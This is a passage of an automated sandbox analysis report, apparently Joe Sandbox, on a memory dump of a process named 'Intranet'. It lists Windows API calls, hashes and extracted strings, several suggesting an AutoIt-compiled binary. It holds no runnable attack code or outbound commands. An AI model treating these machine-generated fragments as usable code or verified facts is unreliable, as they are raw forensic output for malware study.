                                                                            • Instruction Fuzzy Hash: 82A1EE7120430AABD715DF20C984BBBB7A8FF45354F00851AFA99C2291DB38E919CBE5
                                                                            APIs
                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 004FBAB1
                                                                            • _wcscmp.LIBCMT ref: 004FBAC2
                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 004FBAEA
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 004FBB07
                                                                            • _wcscmp.LIBCMT ref: 004FBB25
                                                                            • _wcsstr.LIBCMT ref: 004FBB36
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 004FBB6E
                                                                            • _wcscmp.LIBCMT ref: 004FBB7E
                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 004FBBA5
                                                                            • GetClassNameW.USER32(00000018,?,00000400,?,?), ref: 004FBBEE
                                                                            • _wcscmp.LIBCMT ref: 004FBBFE
                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 004FBC26
                                                                            • GetWindowRect.USER32(00000004,?), ref: 004FBC8F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                            • String ID: @$ThumbnailClass
                                                                            • API String ID: 1788623398-1539354611
                                                                            • Opcode ID: d1196eea0bd005f09cd52f07cb75e4049dc32013f34cf039d89c5e04e6ad9c80
                                                                            • Instruction ID: 7c99f25c6d0b5cfc3165e158c364281e213d192cab4ebf8f4547609a0222a651
                                                                            • Opcode Fuzzy Hash: d1196eea0bd005f09cd52f07cb75e4049dc32013f34cf039d89c5e04e6ad9c80
                                                                            • Instruction Fuzzy Hash: B1819D710043499BDB00DF15C891FBB77E8EF45318F04846EFE898A296DB38E949CBA5
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                            • API String ID: 1038674560-1810252412
                                                                            • Opcode ID: acb3acc321798ce2cadfd8f92c9e379fda63f603acb0cbe282aa99305a66a1dc
                                                                            • Instruction ID: f36985497e59f3fa809cc9a848d24039f4ed7412d6fbe57511cf1dd37625d20c
                                                                            • Opcode Fuzzy Hash: acb3acc321798ce2cadfd8f92c9e379fda63f603acb0cbe282aa99305a66a1dc
                                                                            • Instruction Fuzzy Hash: E831D4B0940209A6DB05FA61CC63EFE7BB4EF15355F60021FFA41710E1EF9D5E0885AA
                                                                            APIs
                                                                            • LoadIconW.USER32(00000063), ref: 004FCBAA
                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004FCBBC
                                                                            • SetWindowTextW.USER32(?,?), ref: 004FCBD3
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004FCBE8
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004FCBEE
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004FCBFE
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004FCC04
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004FCC25
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004FCC3F
                                                                            • GetWindowRect.USER32(?,?), ref: 004FCC48
                                                                            • SetWindowTextW.USER32(?,?), ref: 004FCCB3
                                                                            • GetDesktopWindow.USER32(?), ref: 004FCCB9
                                                                            • GetWindowRect.USER32(00000000), ref: 004FCCC0
                                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004FCD0C
                                                                            • GetClientRect.USER32(?,?), ref: 004FCD19
                                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004FCD3E
                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004FCD69
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                            • String ID:
                                                                            • API String ID: 3869813825-0
                                                                            • Opcode ID: dedc3fd3e1fc2de8256f80c0abcc0319f2ba7abb9c1f27fed6031f443180a29c
                                                                            • Instruction ID: fec8d18a08115a11e12c23111638243bc92304f55ee33cb9bd91f00d797c5c41
                                                                            • Opcode Fuzzy Hash: dedc3fd3e1fc2de8256f80c0abcc0319f2ba7abb9c1f27fed6031f443180a29c
                                                                            • Instruction Fuzzy Hash: D1516F7090070DEFDB209FA8DE86B6FBBF5FF04705F000919E686A26A0C775A914DB54
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0052A87E
                                                                            • DestroyWindow.USER32(00000000,?), ref: 0052A8F8
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0052A972
                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030,?), ref: 0052A994
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0052A9A7
                                                                            • DestroyWindow.USER32(00000000), ref: 0052A9C9
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 0052AA00
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0052AA19
                                                                            • GetDesktopWindow.USER32(?,?), ref: 0052AA32
                                                                            • GetWindowRect.USER32(00000000), ref: 0052AA39
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0052AA51
                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0052AA69
                                                                              • Part of subcall function 004A29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1AE0,?,?,?,?,?,?,004A1D8F,?,?,?), ref: 004A29BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                            • String ID: 0$tooltips_class32
                                                                            • API String ID: 1297703922-3619404913
                                                                            • Opcode ID: d4901b0c307316cc47cf09f054c835ad05c175a87c77421c0f67aa31775f7303
                                                                            • Instruction ID: 1a8466cd8d37694d6ae82e3952559c59ce4cdcae3fc0e5672235997a7bed0332
                                                                            • Opcode Fuzzy Hash: d4901b0c307316cc47cf09f054c835ad05c175a87c77421c0f67aa31775f7303
                                                                            • Instruction Fuzzy Hash: 49719871140304AFD722CF28DC5AF6A7BEAFF9A304F04051DF986872A1D770A945DB62
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • DragQueryPoint.SHELL32(?,?,?,?,?,?), ref: 0052CCCF
                                                                              • Part of subcall function 0052B1A9: ClientToScreen.USER32(?,?,?,?,?,?,?,?,?,0052C6BC,?,?,?), ref: 0052B1D2
                                                                              • Part of subcall function 0052B1A9: GetWindowRect.USER32(?,?), ref: 0052B248
                                                                              • Part of subcall function 0052B1A9: PtInRect.USER32(?,?,0052C6BC,?,?), ref: 0052B258
                                                                            • SendMessageW.USER32(?,000000B0,?,?,?,?,?), ref: 0052CD38
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0052CD43
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0052CD66
                                                                            • _wcscat.LIBCMT ref: 0052CD96
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0052CDAD
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0052CDC6
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0052CDDD
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0052CDFF
                                                                            • DragFinish.SHELL32(?), ref: 0052CE06
                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0052CEF9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                            • API String ID: 169749273-3440237614
                                                                            • Opcode ID: 8a4cf114416ab5276db4e4291838d6d5ea26b12799c1b6c36956818a6ed11f43
                                                                            • Instruction ID: 1e50c46e7f22196cc630d2119f9ff7050fa6b3796e4c1fc4758cbf9a3882950f
                                                                            • Opcode Fuzzy Hash: 8a4cf114416ab5276db4e4291838d6d5ea26b12799c1b6c36956818a6ed11f43
                                                                            • Instruction Fuzzy Hash: 93614571108301AFC701EF64D899D9FBFE8BF99754F000A1EF595922A1DB70AA09CB62
                                                                            APIs
                                                                            • #8.OLEAUT32(00000000,00000000,?,?,?,?,?,?,0000002A,00000000,00530980), ref: 0050831A
                                                                            • #10.WSOCK32(00000000,?,?,?,?,?,?,0000002A,00000000,00530980), ref: 00508323
                                                                            • #9.WSOCK32(00000000,?,?,?,?,?,0000002A,00000000,00530980), ref: 0050832F
                                                                            • #185.OLEAUT32(?,?,?,?,0000002A,00000000,00530980), ref: 0050841D
                                                                            • __swprintf.LIBCMT ref: 0050844D
                                                                            • #220.OLEAUT32(?,?,?,?,?,00000029,00000000,Default), ref: 00508479
                                                                            • #8.OLEAUT32(?,?,00000000,00000000), ref: 0050852A
                                                                            • #6.OLEAUT32(?,?), ref: 005085BE
                                                                            • #9.WSOCK32(?), ref: 00508618
                                                                            • #9.WSOCK32(?), ref: 00508627
                                                                            • #8.OLEAUT32(00000000,00000000,?,00000000,00000000), ref: 00508665
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #185#220__swprintf
                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                            • API String ID: 2563594795-3931177956
                                                                            • Opcode ID: b510ee0bf9afd6324752984d0348322a6b5febba84248046d723fd1bc22d5ec3
                                                                            • Instruction ID: 0e4b103c69c21afdc8b71837069590cab42a41e698cce471f2bf32f14b95c000
                                                                            • Opcode Fuzzy Hash: b510ee0bf9afd6324752984d0348322a6b5febba84248046d723fd1bc22d5ec3
                                                                            • Instruction Fuzzy Hash: A4D1D231604615EBDB249F61C894FBEBBB4BF85B00F14895AE9859B2C0DF74EC44DBA0
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00524A61
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000,00530980), ref: 00524AAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 3974292440-4258414348
                                                                            • Opcode ID: 352b4642b2d98d2b4c785e36c801b745a2a764563c11aa27069c3a8da5ea2b0b
                                                                            • Instruction ID: 8aeb202d0d1cc5772b06e215fd7d4be72dbeadc078465debf79e05f1d3df953b
                                                                            • Opcode Fuzzy Hash: 352b4642b2d98d2b4c785e36c801b745a2a764563c11aa27069c3a8da5ea2b0b
                                                                            • Instruction Fuzzy Hash: AD919E742007119FCB04EF25C451A6EBBA1BF95358F10885EF8965B3A2CB78FD09CB85
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010,00000000,?,?,?,?,?,005297E7), ref: 0052BF26
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005297E7), ref: 0052BF82
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0052BFBB
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0052BFFE
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0052C035
                                                                            • FreeLibrary.KERNEL32(?), ref: 0052C041
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001,?,?,?,?,005297E7), ref: 0052C051
                                                                            • DestroyIcon.USER32(?,?,?,?,?,005297E7), ref: 0052C060
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000,?,?,?,?,005297E7), ref: 0052C07D
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001,?,?,?,?,005297E7), ref: 0052C089
                                                                              • Part of subcall function 004C312D: __wcsicmp_l.LIBCMT ref: 004C31B6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 1212759294-1154884017
                                                                            • Opcode ID: 483182d5bbf80cdd8f10595d5ac8dfea5b92eff36d0d85d15e9e8003d5f90794
                                                                            • Instruction ID: 042a9ab5e9d5e8551692362fac3b8a3da296d56347fb8f0546b08f17fced3307
                                                                            • Opcode Fuzzy Hash: 483182d5bbf80cdd8f10595d5ac8dfea5b92eff36d0d85d15e9e8003d5f90794
                                                                            • Instruction Fuzzy Hash: 7F61BD71500228FEEB24DF64ED45BBE7BA8FF09710F10420AF915D61C1DBB5AA94DBA0
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 0050E31F
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 0050E32F
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0050E33B
                                                                            • __wsplitpath.LIBCMT ref: 0050E399
                                                                            • _wcscat.LIBCMT ref: 0050E3B1
                                                                            • _wcscat.LIBCMT ref: 0050E3C3
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0050E3D8
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050E3EC
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050E41E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050E43F
                                                                            • _wcscpy.LIBCMT ref: 0050E44B
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0050E48A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                            • String ID: *.*
                                                                            • API String ID: 3566783562-438819550
                                                                            • Opcode ID: 89e8042f9d802e5b76b862917bc57274b392ecfe8fc73d1087e31574f7f147b8
                                                                            • Instruction ID: e2d2076db567cfa63e6b08073198daabf1f62206f16ad62a7429f4c67386f1a7
                                                                            • Opcode Fuzzy Hash: 89e8042f9d802e5b76b862917bc57274b392ecfe8fc73d1087e31574f7f147b8
                                                                            • Instruction Fuzzy Hash: 536198761043059FCB10EF60C845A9FB7E8BF89314F048D1EF98987291EB35E905CB96
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?,00000000,?,?,0051CF1B,?,?,00000035,?,0053098C,?,?,00000016), ref: 0050A2C2
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?,?,0051CF1B,?,?,00000035,?,0053098C,?,?,00000016,?), ref: 0050A2E3
                                                                            • __swprintf.LIBCMT ref: 0050A33C
                                                                            • __swprintf.LIBCMT ref: 0050A355
                                                                            • _wprintf.LIBCMT ref: 0050A3FC
                                                                            • _wprintf.LIBCMT ref: 0050A41A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 311963372-3080491070
                                                                            • Opcode ID: 147a71a536e1622e0fb6321d00f6099a2e81823216a0e0484250a0aae0d9846e
                                                                            • Instruction ID: ea5254e1978e0950a9fb8c22efc689cb870d2ae3a5ecaae29a7133f1eafbf4aa
                                                                            • Opcode Fuzzy Hash: 147a71a536e1622e0fb6321d00f6099a2e81823216a0e0484250a0aae0d9846e
                                                                            • Instruction Fuzzy Hash: 4151E371800209AACF14EBE1CD66EEEBB78FF14344F50015AF405B20A2EB792F58DB65
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,?,?,004EF8B8,00000001,0000138C,00000001,?,00000001,?,00513FF9,?), ref: 0050009A
                                                                            • LoadStringW.USER32(00000000,?,004EF8B8,00000001,0000138C,00000001,?,00000001,?,00513FF9,?,00000001,?,00513FF9,00000040,00000064), ref: 005000A3
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • GetModuleHandleW.KERNEL32(00000000,00567310,?,00000FFF,?,?,004EF8B8,00000001,0000138C,00000001,?,00000001,?,00513FF9,?,00000001), ref: 005000C5
                                                                            • LoadStringW.USER32(00000000,?,004EF8B8,00000001,0000138C,00000001,?,00000001,?,00513FF9,?,00000001,?,00513FF9,00000040,00000064), ref: 005000C8
                                                                            • __swprintf.LIBCMT ref: 00500118
                                                                            • __swprintf.LIBCMT ref: 00500129
                                                                            • _wprintf.LIBCMT ref: 005001D2
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010,?,Error: ,00533B88,?), ref: 005001E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 984253442-2268648507
                                                                            • Opcode ID: 46f8055f44259123466a01758c3fbe505fa328f505662ad56d2b0d91e6c6640a
                                                                            • Instruction ID: 308327885512780f63360bd782d7e6d7de373b81a5837452d355eb99014682f4
                                                                            • Opcode Fuzzy Hash: 46f8055f44259123466a01758c3fbe505fa328f505662ad56d2b0d91e6c6640a
                                                                            • Instruction Fuzzy Hash: 45415272800119AACF15FBE1CDA6EEEB77CAF54345F50015AF505B20A1DA386F08CB75
                                                                            APIs
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • CharLowerBuffW.USER32(?,?), ref: 0050AA0E
                                                                            • GetDriveTypeW.KERNEL32 ref: 0050AA5B
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0050AAA3
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0050AADA
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0050AB08
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
